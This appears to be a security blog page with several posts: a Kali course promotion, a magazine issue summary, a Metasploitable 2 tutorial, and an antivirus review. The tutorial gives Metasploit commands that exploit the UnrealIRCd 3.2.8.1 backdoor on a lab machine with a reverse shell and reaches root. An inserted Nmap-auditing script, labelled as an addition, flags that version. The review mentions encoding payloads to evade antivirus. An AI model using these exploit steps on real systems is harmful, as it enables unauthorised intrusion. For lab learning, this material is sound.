Video Training: Kali Linux – Assuring Security by Penetration Testing

Want to learn computer security and don’t know where to start? Want to learn some of the latest hacking and pentesting techniques using Kali Linux? Know security pretty well, but want to brush up on your skills and see what the new Kali Linux has to offer?

And all at a very affordable price?

Then look no further than “Kali Linux – Backtrack Evolved: Assuring Security by Penetration Testing”.

The teacher, Justin Hutchens, is a bright young rising infosec star. I had the absolute honor to work on Justin’s training class as a technical reviewer, and can honestly tell you that you are going to be engaged, and you are going to learn some great material from a very impressive, easy to follow and capable teacher.

The course covers almost 3 hours of hands on learning that will teach you how to:

  • Prepare a fully-functional and low-budget security lab, where you can practice and develop your penetration testing skills without fear of legal consequence
  • Gather information about a target with advanced reconnaissance techniques
  • Identify target systems on a network using host discovery tools
  • Identify services running on target systems by scanning and enumeration
  • Discover vulnerabilities to determine potential attack vectors
  • Launch automated exploits and payloads using the Metasploit Framework
  • Learn a variety of hands-on techniques to exploit target systems
  • Establish backdoors to ensure continued access
  • Escalate privileges to acquire maximum control over compromised systems

For pricing and more information see the PacktPub Website.

Check it out!

Hakin9 Exploiting Software September Issue is out!

Another excellent issue of Hakin9 Exploiting Software is here!

Check out these exciting articles:

Windows 8 Security in Action
By Daniel Dieterle

In this issue I wrote the article “Windows 8 Security in Action”, which gives a short look at the new Windows 8 look for those who haven’t seen it yet and then delves into its updated security features and lingering security issues from previous versions of Windows:

Is Windows 8 the next operating system for your enterprise? In this article, we will take a quick look at Microsoft’s new OS – Windows 8. We will see some of the new security features that make it more secure than its predecessor Windows 7. We will also run the security through the paces and see some of the possible issues that are new to the OS and some that have carried over from previous versions of Windows. From the Backtrack 5 r3 security testing platform, the author uses the Metasploit Framework and Social Engineering Toolkit to see how Windows 8 stands up to the most common internet based threats.

Raspberry Pi Hacking
By Jeremiah Brott

Follow this guide at your own risk. I take no responsibility for any outcome from anything you attempt to do within this guide – says the author. The Raspberry Pi is a credit-card sized computer that plugs into your TV and a keyboard. It’s a capable little PC which can be used for many of the things that your desktop PC does, like spreadsheets, word-processing and games. It also plays high-definition video. We want to see it being used by kids all over the world to learn programming. If you love your Pi you’ll definitely love to hack it.

Malware, Botnet and cyber threats, what is happening to the cyberspace?
By Pierluigi Paganini

The article proposes an analysis of the main cyber threats that worry security experts and that are profoundly changing the cyber space. The exponential growth of the number of cyber threats and attacks is rebutted by a wide range of statistics provided by reports published by the major security firms. The scenario is really scary due to the concomitant action of cybercriminals, hacktivists and state sponsored hackers that are producing malware and botnets of increasing complexity.

Live Capture Procedures
By Craig Wright

Live data capture is an essential skill required for both Incident Handlers as well as Forensic practitioners and it is one that is becoming more, not less, important over time as we move towards networked and cloud based systems. This article has introduced a few tools that, although free, can be used together to create a powerful network forensics and incident response toolkit. Like all of these tools, the secret comes to practice.

  • SQL Injection By Wong Chon Kit
  • Network Pen Testing Breaking the Corporate Network through Hackers Perspective By Amar Wakharkar
  • Intel SMEP overview and bypass on Windows 8 By Artem Shikhin
  • Android Application Assessment By Nilesh Kumar

Check it out!

Metasploitable 2.0 Tutorial Part 3: Gaining Root from a Vulnerable Service

Continuing our tutorial series on Metasploitable 2, the purposefully vulnerable virtual machine used to learn security techniques, this time we will look at how to get root access from a vulnerable service.

We saw in previous tutorials how to scan a system for open ports with Nmap, and how to use Metasploit’s built in scanners to identify software revision levels.

I alluded to it earlier, so let’s take a look at UnrealIRCD sitting at port 6667. I chose this service for a few reasons. First of all there are numerous Metasploitable how-to’s out there, but a lot of them focus on the standard services. Secondly, in real life, which is the service that will most likely go unpatched? The main web server or some secondary service that was installed for a project and then forgotten about?

So let’s get started!

From the nmap scan we saw this output for Unreal ircd:

Let’s take the version number and do a search to see if there are any vulnerabilities or exploits that we can take advantage of. We can search the web, or we can search inside Metasploit using the “search” command. Let’s look at both!

First a quick Google search for “Unreal3.2.8.1 exploit” returns this:

Cute, this version of UnrealIRCD had a backdoor added to it. Well I think this is definitely worth trying, especially as it has an “Excellent” Metasploit rank, which basically means the exploit is very stable and works consistently. The exploit to use is listed further down Metasploit’s webpage, but we could find it by using the “Search” command in the Metasploit Framework as below:

As you can see there is only the one exploit in Metasploit for UnrealIRCD and it is the 3.2.8.1 backdoor exploit.

Excellent!

So, let’s “use” it and check the options:

All it needs is the remote host address:

set RHOST 192.168.12.20 (Metasploitable’s IP address)

Don’t forget to choose a payload for the exploit:

This command lists all the payloads that are compatible with this exploit. Unfortunately they are all command shells. A Meterpreter shell would be better than a command shell, and give us more options, but for now we will just use the generic reverse shell. This will drop us right into a terminal shell with the target when the exploit is finished.

set PAYLOAD generic/shell_reverse_tcp

For this payload all we need to do is set the LHOST option (the IP of our Backtrack Metasploit system) and then do a final “show options” to make sure everything is set okay:

Our RHOST (target) and LHOST (Attacker system that the shell will connect to) values are correctly set.

We are golden, now just type “exploit”:

Notice it says that a session is opened, but then it just gives you a blinking cursor. You are actually sitting in a terminal shell with the target machine. As you can see above, I typed “whoami” and the target system responded with “root”. The “Root” user is the highest level user that you can be on a Linux machine! It worked!

So to re-cap, we found an open service on the target machine. Searched for and found an exploit that works on the software version present. And finally, used the exploit and obtained a full remote shell.
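A defender's counterpart to the recap above, as an added example that is not part of the original tutorial: it parses Nmap grepable (-oG) output, flags open services missing from an approved per-host baseline, and flags the backdoored UnrealIRCd 3.2.8.1 version string. The scan text, the baseline, the second host and the exact version-string format are constructed assumptions.

```python
import re

# Constructed sample of Nmap grepable (-oG) version-scan output; not real scan data.
SAMPLE_SCAN = (
    "# Nmap scan (constructed sample)\n"
    "Host: 192.168.12.20 ()\tStatus: Up\n"
    "Host: 192.168.12.20 ()\tPorts: 22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1/, "
    "80/open/tcp//http//Apache httpd 2.2.8/, 6667/open/tcp//irc//Unreal ircd 3.2.8.1/, "
    "8180/filtered/tcp//unknown///\n"
    "Host: 192.168.12.30 ()\tPorts: 22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1/, "
    "443/open/tcp//https//Apache httpd 2.2.8/\n"
)

# Hypothetical baseline: the ports each host is approved to expose.
APPROVED = {"192.168.12.20": {22, 80}, "192.168.12.30": {22, 443}}

# Version strings to flag; the pattern's spelling of the banner is an assumption.
KNOWN_BAD = {
    "UnrealIRCd 3.2.8.1 (backdoored release)":
        re.compile(r"unreal\s*(ircd)?\s*3\.2\.8\.1", re.IGNORECASE),
}

def parse_grepable(text):
    """Yield (host, port, proto, service, version) for every open port."""
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue  # skip comments and blank lines
        fields = line.split("\t")
        host = fields[0].split()[1]
        ports = next((f[len("Ports: "):] for f in fields if f.startswith("Ports: ")), "")
        for entry in filter(None, (e.strip() for e in ports.split(", "))):
            # Entry layout: port/state/proto/owner/service/rpcinfo/version/
            parts = entry.split("/")
            if len(parts) >= 7 and parts[1] == "open":
                yield host, int(parts[0]), parts[2], parts[4], parts[6]

def audit(text, approved, bad_versions):
    """Return findings for unapproved services and known-bad versions."""
    findings = []
    for host, port, _proto, service, version in parse_grepable(text):
        if port not in approved.get(host, set()):
            findings.append((host, port, "unapproved-service", f"{service} {version}".strip()))
        for label, pattern in bad_versions.items():
            if pattern.search(version):
                findings.append((host, port, "known-bad-version", label))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_SCAN, APPROVED, KNOWN_BAD):
        print(finding)
```
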

All the standard Linux commands work in our shell. But if you poke around a little bit, you will find that you are in the /etc/unreal directory (use the “pwd” command). And it will not allow you out of this directory. Odd, but don’t forget that we are the Root user! We can make new users, or do almost anything else that we want.

* Update – Ran this using a different shell as a payload and was able to surf the directory structure without problems.

In the next tutorial I will show you how to grab information from the Linux machine using our foothold that will allow us to access other existing accounts and further exploit the system.

Until next time!

Bitdefender Total Security 2013 Review and License Give Away!

Take one of the best anti-virus products out there and integrate a ton of client and online security add-ins and what do you have? Bitdefender Total Security 2013!

Again this year, Bitdefender has provided Cyberarms a review copy of its latest Total Security product for us to put through the wringer, and again it did not disappoint.

Okay, I am not going to spend a lot of time covering the antivirus engine this year. We covered the 2012 version and it received top marks. Even PC Mag gave Bitdefender’s Antivirus Plus 2013 its Editor’s Choice Award. This year I want to spend more time covering some of the new and updated features.

I will say though that the 2013 release seems just as robust against malware and phishing attempts, and better in some circumstances. In testing, 2013 correctly detected some compressed exploit files from a security conference that were in a huge zipped compilation. The drive was scanned with 2012 and the files were not detected.

Actually, Bitdefender anti-virus is the bane of my security research existence. 🙂

Let me explain.

I use Bitdefender on a couple dual purpose machines that are also used for security research.

I have to uninstall (not turn off!) Bitdefender from these machines when I play with Backtrack 5 and the Metasploit Framework. No matter how many times I encode or pack a malicious payload with Metasploit, Bitdefender catches and blocks it. And this is with Backtrack running in a virtual machine. Even with active scanning and the firewall service turned off, it still identifies and quarantines the payload. I have to completely uninstall Bitdefender from the machines to be able to perform Metasploit mayhem with them.

My only qualm about the anti-virus is that it seems to take a very long time to perform a full scan. But I usually set the scan engine to aggressive and scan every file.

The Anti-Virus engine is excellent, let’s move on.

Administrator Control Panel

One of the first things you will notice, if you are logged in as an administrator, is the control panel interface. The red “x” means that there is an issue that should be taken care of right away.

In this instance, the virus update had not been run in several days.

Simply clicking on the center of the control panel shows you what the issue is and how to remedy it.

The number in red tells you that there are events that should be reviewed, and how many there are to check.

Firewall activity – Displays a bar graph of Firewall activity. If you click on the Firewall Activity button, you can modify firewall settings, change rules or check network activity. They also have a pretty nifty “Paranoid Mode” that allows you to view every communication attempt with the option to either block or allow. This could be handy if you are investigating a possible breach in progress or monitoring strange communications.

Scanner Activity – The progress bar on the right side of the control panel shows scanning progress. Clicking on the scanner activity button allows you to view and modify anti-virus settings.

What is great is if you have a suspicious file or folder, you can just drag and drop it on the control panel and Bitdefender will scan it for you.

If there are no issues or event news, the control panel will look like this:

Finally, clicking on the ID Badge at the bottom will take you to the My Bitdefender page.

My Bitdefender

Apart from malware and e-mail phishing attempts, Identity Theft, and social engineering attempts through social media sites are top targets for the cyber criminal.

Twitter and Facebook protection are included in Total Security 2013. Just run through the quick setup in each and Bitdefender protection is extended to these social media programs. Incoming links from these sites are scanned for threats. Setup is fairly quick, and like all Bitdefender applets, it runs silently in the background.

Safebox brings Dropbox like features to Bitdefender. You get 2GB of free encrypted cloud storage included. It is very easy to create new folders, upload data and share files with other PCs, or mobile devices. It even gives you a Windows like Recycle Bin in case you delete a file and change your mind.

SafePay

What a great idea: whenever you go to do online secure banking transactions, Bitdefender drops you into a barricaded session that protects your wireless session if you are on Wi-Fi and gives you a virtual keyboard to protect your input from being sniffed by hackers.

Though an incredible idea, I did have problems with this. When your computer enters this protected Safepay session, you enter a sandboxed browser. Getting back out of it though, to check an account validation e-mail for example, was not very intuitive.

Once I exited the sandboxed session to get my validation e-mail so I could log in, it created a new session with my banking provider, so I would have needed another validation e-mail.

Though not perfect, this is a huge move in the right direction. Especially for PC users that need to use public networks for banking or shopping.

Mobile Anti-Theft

Another new cool feature, Bitdefender allows you to view the location of your PC or mobile device, and gives you the option of remotely locking it or even wiping it. After installing the Anti-Theft app, the location of your device shows up on a Google map. Though not completely accurate for a PC without GPS (my computer showed up about a mile away from my house), this could be very handy for locating lost or stolen Mobile devices.

Conclusion

This was just a quick look at some of Bitdefender Total Security features. There are several others that I did not mention. If you want one of the best anti-malware solutions loaded with extra security features, that doesn’t inundate you with pop up warnings and messages, look no further than Bitdefender Total Security 2013!

GIVEAWAY

Want a chance to win a license for a full copy of Total Security 2013? Cyberarms in conjunction with Bitdefender is giving away 5 licenses of the award winning software. Simply share a link to this review on your favorite social media site. Then place a copy of the link in the comments field below. Winners will be chosen at random in two weeks (August 9th) from links in the comments section.

Don’t want to wait? Why not try out Bitdefender’s excellent protection now? Go to Bitdefender’s website and click the “Try it FREE” link to download a time limited trial.

*** The contest is now over, congrats to our winners! ***